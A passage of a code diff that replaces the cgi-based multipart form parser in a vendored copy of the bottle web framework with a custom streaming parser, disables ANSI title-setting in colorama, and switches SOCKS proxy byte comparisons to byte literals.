raise StopMarkupException()
|
||||
cur_meth = self.cur_meth
|
||||
abs_start_section = self.abs_start_section
|
||||
start_next_sec = 0
|
||||
skip_start = 0
|
||||
tlen = self.tlen
|
||||
eat_data, eat_headers = self._eat_data, self._eat_headers
|
||||
while True:
|
||||
try:
|
||||
end_section = cur_meth(chunk, start_next_sec)
|
||||
except StopMarkupException:
|
||||
self.stopped = True
|
||||
return
|
||||
if end_section is None: break
|
||||
if cur_meth == eat_headers:
|
||||
sec_name = 'headers'
|
||||
start_next_sec = end_section + CRLFx2_LEN
|
||||
cur_meth = eat_data
|
||||
skip_start = 0
|
||||
elif cur_meth == eat_data:
|
||||
sec_name = 'data'
|
||||
start_next_sec = end_section + tlen
|
||||
skip_start = CRLF_LEN
|
||||
cur_meth = eat_headers
|
||||
else:
|
||||
assert cur_meth == self._eat_start_boundary
|
||||
sec_name = 'data'
|
||||
start_next_sec = end_section + tlen
|
||||
skip_start = CRLF_LEN
|
||||
cur_meth = eat_headers
|
||||
|
||||
# if the body starts with a hyphen,
|
||||
# we will have a negative abs_end_section equal to the length of the CRLF
|
||||
abs_end_section = self.abspos + end_section
|
||||
if abs_end_section < 0:
|
||||
assert abs_end_section == -CRLF_LEN
|
||||
end_section = -self.abspos
|
||||
yield sec_name, (abs_start_section, self.abspos + end_section)
|
||||
abs_start_section = self.abspos + start_next_sec + skip_start
|
||||
self.abspos += len(chunk)
|
||||
self.cur_meth = cur_meth
|
||||
self.abs_start_section = abs_start_section
|
||||
|
||||
def _eat_start_boundary(self, chunk, base):
|
||||
if self.trest is None:
|
||||
chunk_start = chunk[base: base + 1]
|
||||
if not chunk_start: return
|
||||
if chunk_start == CR: return self._eat_data(chunk, base)
|
||||
boundary = self.boundary
|
||||
if chunk.startswith(boundary): return base - CRLF_LEN
|
||||
if chunk_start != boundary[:1]:
|
||||
raise HTTPError(
|
||||
422, 'Invalid multipart/formdata body start, expected hyphen or CR, got: %s' % chunk_start)
|
||||
self.trest = boundary
|
||||
self.trest_len = len(boundary)
|
||||
end_section = self._eat_data(chunk, base)
|
||||
if end_section is not None: return end_section
|
||||
|
||||
def _eat_data(self, chunk, base):
|
||||
chunk_len = len(chunk)
|
||||
token, tlen, trest, trest_len = self.token, self.tlen, self.trest, self.trest_len
|
||||
start = base
|
||||
match_tail = self._match_tail
|
||||
part = None
|
||||
while True:
|
||||
end = start + tlen
|
||||
if end > chunk_len:
|
||||
part = chunk[start:]
|
||||
break
|
||||
if trest is not None:
|
||||
if chunk[start:start + trest_len] == trest:
|
||||
data_end = start + trest_len - tlen
|
||||
self.trest_len = self.trest = None
|
||||
return data_end
|
||||
else:
|
||||
trest_len = trest = None
|
||||
matched_len = match_tail(chunk, start, end)
|
||||
if matched_len is not None:
|
||||
if matched_len == tlen:
|
||||
self.trest_len = self.trest = None
|
||||
return start
|
||||
else:
|
||||
trest_len, trest = tlen - matched_len, token[matched_len:]
|
||||
start += tlen
|
||||
# process the tail of the chunk
|
||||
if part:
|
||||
part_len = len(part)
|
||||
if trest is not None:
|
||||
if part_len < trest_len:
|
||||
if trest.startswith(part):
|
||||
trest_len -= part_len
|
||||
trest = trest[part_len:]
|
||||
part = None
|
||||
else:
|
||||
trest_len = trest = None
|
||||
else:
|
||||
if part.startswith(trest):
|
||||
data_end = start + trest_len - tlen
|
||||
self.trest_len = self.trest = None
|
||||
return data_end
|
||||
trest_len = trest = None
|
||||
|
||||
if part is not None:
|
||||
assert trest is None
|
||||
matched_len = match_tail(part, 0, part_len)
|
||||
if matched_len is not None:
|
||||
trest_len, trest = tlen - matched_len, token[matched_len:]
|
||||
self.trest_len, self.trest = trest_len, trest
|
||||
|
||||
def _parse(self, chunk):
|
||||
for name, start_end in self._iter_markup(chunk):
|
||||
self.markups.append([name, start_end])
|
||||
|
||||
def parse(self, chunk):
|
||||
if self.error is not None: return
|
||||
try:
|
||||
self._parse(chunk)
|
||||
except Exception as exc:
|
||||
self.error = exc
|
||||
|
||||
|
||||
class MPBytesIOProxy:
|
||||
def __init__(self, src, start, end):
|
||||
self._src = src
|
||||
self._st = start
|
||||
self._end = end
|
||||
self._pos = start
|
||||
|
||||
def tell(self):
|
||||
return self._pos - self._st
|
||||
|
||||
def seek(self, pos):
|
||||
if pos < 0: pos = 0
|
||||
self._pos = min(self._st + pos, self._end)
|
||||
|
||||
def read(self, sz=None):
|
||||
max_sz = self._end - self._pos
|
||||
if max_sz <= 0:
|
||||
return tob('')
|
||||
if sz is not None and sz > 0:
|
||||
sz = min(sz, max_sz)
|
||||
else:
|
||||
sz = max_sz
|
||||
self._src.seek(self._pos)
|
||||
self._pos += sz
|
||||
return self._src.read(sz)
|
||||
|
||||
def writable(self):
|
||||
return False
|
||||
|
||||
def fileno(self):
|
||||
raise OSError('Not supported')
|
||||
|
||||
def closed(self):
|
||||
return self._src.closed()
|
||||
|
||||
def close(self):
|
||||
pass
|
||||
|
||||
|
||||
class MPHeader:
|
||||
def __init__(self, name, value, options):
|
||||
self.name = name
|
||||
self.value = value
|
||||
self.options = options
|
||||
|
||||
|
||||
class MPFieldStorage:
|
||||
|
||||
_patt = re.compile(tonat('(.+?)(=(.+?))?(;|$)'))
|
||||
|
||||
def __init__(self):
|
||||
self.name = None
|
||||
self.value = None
|
||||
self.filename = None
|
||||
self.file = None
|
||||
self.ctype = None
|
||||
self.headers = {}
|
||||
|
||||
def read(self, src, headers_section, data_section, max_read):
|
||||
start, end = headers_section
|
||||
sz = end - start
|
||||
has_read = sz
|
||||
if has_read > max_read:
|
||||
raise HTTPError(413, 'Request entity too large')
|
||||
src.seek(start)
|
||||
headers_raw = tonat(src.read(sz))
|
||||
for header_raw in headers_raw.splitlines():
|
||||
header = self.parse_header(header_raw)
|
||||
self.headers[header.name] = header
|
||||
if header.name == 'Content-Disposition':
|
||||
self.name = header.options['name']
|
||||
self.filename = header.options.get('filename')
|
||||
elif header.name == 'Content-Type':
|
||||
self.ctype = header.value
|
||||
if self.name is None:
|
||||
raise HTTPError(422, 'Noname field found while parsing multipart/formdata body: %s' % header_raw)
|
||||
if self.filename is not None:
|
||||
self.file = MPBytesIOProxy(src, *data_section)
|
||||
else:
|
||||
start, end = data_section
|
||||
sz = end - start
|
||||
if sz:
|
||||
has_read += sz
|
||||
if has_read > max_read:
|
||||
raise HTTPError(413, 'Request entity too large')
|
||||
src.seek(start)
|
||||
self.value = tonat(src.read(sz))
|
||||
else:
|
||||
self.value = ''
|
||||
return has_read
|
||||
|
||||
@classmethod
|
||||
def parse_header(cls, s):
|
||||
htype, rest = s.split(':', 1)
|
||||
opt_iter = cls._patt.finditer(rest)
|
||||
hvalue = next(opt_iter).group(1).strip()
|
||||
dct = {}
|
||||
for it in opt_iter:
|
||||
k = it.group(1).strip()
|
||||
v = it.group(3)
|
||||
if v is not None:
|
||||
v = v.strip('"')
|
||||
dct[k.lower()] = v
|
||||
return MPHeader(name=htype, value=hvalue, options=dct)
|
||||
|
||||
@classmethod
|
||||
def iter_items(cls, src, markup, max_read):
|
||||
iter_markup = iter(markup)
|
||||
# check & skip empty data (body should start from empty data)
|
||||
null_data = next(iter_markup, None)
|
||||
if null_data is None: return
|
||||
sec_name, [start, end] = null_data
|
||||
assert sec_name == 'data'
|
||||
if end > 0:
|
||||
raise HTTPError(
|
||||
422, 'Malformed multipart/formdata, unexpected data before the first boundary at: [%d:%d]'
|
||||
% (start, end))
|
||||
headers = next(iter_markup, None)
|
||||
data = next(iter_markup, None)
|
||||
while headers:
|
||||
sec_name, headers_slice = headers
|
||||
assert sec_name == 'headers'
|
||||
if not data:
|
||||
raise HTTPError(
|
||||
422, 'Malformed multipart/formdata, no data found for the field at: [%d:%d]'
|
||||
% tuple(headers_slice))
|
||||
sec_name, data_slice = data
|
||||
assert sec_name == 'data'
|
||||
field = cls()
|
||||
has_read = field.read(src, headers_slice, data_slice, max_read=max_read)
|
||||
max_read -= has_read
|
||||
yield field
|
||||
headers = next(iter_markup, None)
|
||||
data = next(iter_markup, None)
|
||||
|
||||
|
||||
class BaseRequest(object):
|
||||
""" A wrapper for WSGI environment dictionaries that adds a lot of
|
||||
@@ -1326,6 +1720,10 @@ class BaseRequest(object):
|
||||
|
||||
@DictProperty('environ', 'bottle.request.body', read_only=True)
|
||||
def _body(self):
|
||||
mp_markup = None
|
||||
mp_boundary_match = MULTIPART_BOUNDARY_PATT.match(self.environ.get('CONTENT_TYPE', ''))
|
||||
if mp_boundary_match is not None:
|
||||
mp_markup = MPBodyMarkup(tob(mp_boundary_match.group(1)))
|
||||
try:
|
||||
read_func = self.environ['wsgi.input'].read
|
||||
except KeyError:
|
||||
@@ -1335,12 +1733,15 @@ class BaseRequest(object):
|
||||
body, body_size, is_temp_file = BytesIO(), 0, False
|
||||
for part in body_iter(read_func, self.MEMFILE_MAX):
|
||||
body.write(part)
|
||||
if mp_markup is not None:
|
||||
mp_markup.parse(part)
|
||||
body_size += len(part)
|
||||
if not is_temp_file and body_size > self.MEMFILE_MAX:
|
||||
body, tmp = NamedTemporaryFile(mode='w+b'), body
|
||||
body.write(tmp.getvalue())
|
||||
del tmp
|
||||
is_temp_file = True
|
||||
body.multipart_markup = mp_markup
|
||||
self.environ['wsgi.input'] = body
|
||||
body.seek(0)
|
||||
return body
|
||||
@@ -1378,7 +1779,7 @@ class BaseRequest(object):
|
||||
def POST(self):
|
||||
""" The values of :attr:`forms` and :attr:`files` combined into a single
|
||||
:class:`FormsDict`. Values are either strings (form values) or
|
||||
instances of :class:`cgi.FieldStorage` (file uploads).
|
||||
instances of :class:`MPBytesIOProxy` (file uploads).
|
||||
"""
|
||||
post = FormsDict()
|
||||
# We default to application/x-www-form-urlencoded for everything that
|
||||
@@ -1389,18 +1790,15 @@ class BaseRequest(object):
|
||||
post[key] = value
|
||||
return post
|
||||
|
||||
safe_env = {'QUERY_STRING': ''} # Build a safe environment for cgi
|
||||
for key in ('REQUEST_METHOD', 'CONTENT_TYPE', 'CONTENT_LENGTH'):
|
||||
if key in self.environ: safe_env[key] = self.environ[key]
|
||||
args = dict(fp=self.body, environ=safe_env, keep_blank_values=True)
|
||||
|
||||
if py3k:
|
||||
args['encoding'] = 'utf8'
|
||||
post.recode_unicode = False
|
||||
data = cgi.FieldStorage(**args)
|
||||
self['_cgi.FieldStorage'] = data #http://bugs.python.org/issue18394
|
||||
data = data.list or []
|
||||
for item in data:
|
||||
body = self.body
|
||||
markup = body.multipart_markup
|
||||
if markup is None:
|
||||
raise HTTPError(400, '`boundary` required for mutlipart content')
|
||||
elif markup.error is not None:
|
||||
raise markup.error
|
||||
for item in MPFieldStorage.iter_items(body, markup.markups, self.MEMFILE_MAX):
|
||||
if item.filename is None:
|
||||
post[item.name] = item.value
|
||||
else:
|
||||
|
||||
4
thirdparty/colorama/ansitowin32.py
vendored
4
thirdparty/colorama/ansitowin32.py
vendored
@@ -243,6 +243,6 @@ class AnsiToWin32(object):
|
||||
# 0 - change title and icon (we will only change title)
|
||||
# 1 - change icon (we don't support this)
|
||||
# 2 - change title
|
||||
if params[0] in '02':
|
||||
winterm.set_title(params[1])
|
||||
# if params[0] in '02':
|
||||
# winterm.set_title(params[1])
|
||||
return text
|
||||
|
||||
16
thirdparty/socks/socks.py
vendored
16
thirdparty/socks/socks.py
vendored
@@ -185,23 +185,23 @@ class socksocket(socket.socket):
|
||||
# We'll receive the server's response to determine which
|
||||
# method was selected
|
||||
chosenauth = self.__recvall(2)
|
||||
if chosenauth[0:1] != chr(0x05).encode():
|
||||
if chosenauth[0:1] != b'\x05':
|
||||
self.close()
|
||||
raise GeneralProxyError((1, _generalerrors[1]))
|
||||
# Check the chosen authentication method
|
||||
if chosenauth[1:2] == chr(0x00).encode():
|
||||
if chosenauth[1:2] == b'\x00':
|
||||
# No authentication is required
|
||||
pass
|
||||
elif chosenauth[1:2] == chr(0x02).encode():
|
||||
elif chosenauth[1:2] == b'\x02':
|
||||
# Okay, we need to perform a basic username/password
|
||||
# authentication.
|
||||
self.sendall(chr(0x01).encode() + chr(len(self.__proxy[4])).encode() + self.__proxy[4].encode() + chr(len(self.__proxy[5])).encode() + self.__proxy[5].encode())
|
||||
self.sendall(b'\x01' + chr(len(self.__proxy[4])).encode() + self.__proxy[4].encode() + chr(len(self.__proxy[5])).encode() + self.__proxy[5].encode())
|
||||
authstat = self.__recvall(2)
|
||||
if authstat[0:1] != chr(0x01).encode():
|
||||
if authstat[0:1] != b'\x01':
|
||||
# Bad response
|
||||
self.close()
|
||||
raise GeneralProxyError((1, _generalerrors[1]))
|
||||
if authstat[1:2] != chr(0x00).encode():
|
||||
if authstat[1:2] != b'\x00':
|
||||
# Authentication failed
|
||||
self.close()
|
||||
raise Socks5AuthError((3, _socks5autherrors[3]))
|
||||
@@ -209,7 +209,7 @@ class socksocket(socket.socket):
|
||||
else:
|
||||
# Reaching here is always bad
|
||||
self.close()
|
||||
if chosenauth[1] == chr(0xFF).encode():
|
||||
if chosenauth[1:2] == b'\xff':
|
||||
raise Socks5AuthError((2, _socks5autherrors[2]))
|
||||
else:
|
||||
raise GeneralProxyError((1, _generalerrors[1]))
|
||||
@@ -219,7 +219,7 @@ class socksocket(socket.socket):
|
||||
# use the IPv4 address request even if remote resolving was specified.
|
||||
try:
|
||||
ipaddr = socket.inet_aton(destaddr)
|
||||
req = req + chr(0x01).encode() + ipaddr
|
||||
req = req + b'\x01' + ipaddr
|
||||
except socket.error:
|
||||
# Well it's not an IP number, so it's probably a DNS name.
|
||||
if self.__proxy[3]:
|
||||
|
||||
Reference in New Issue
Block a user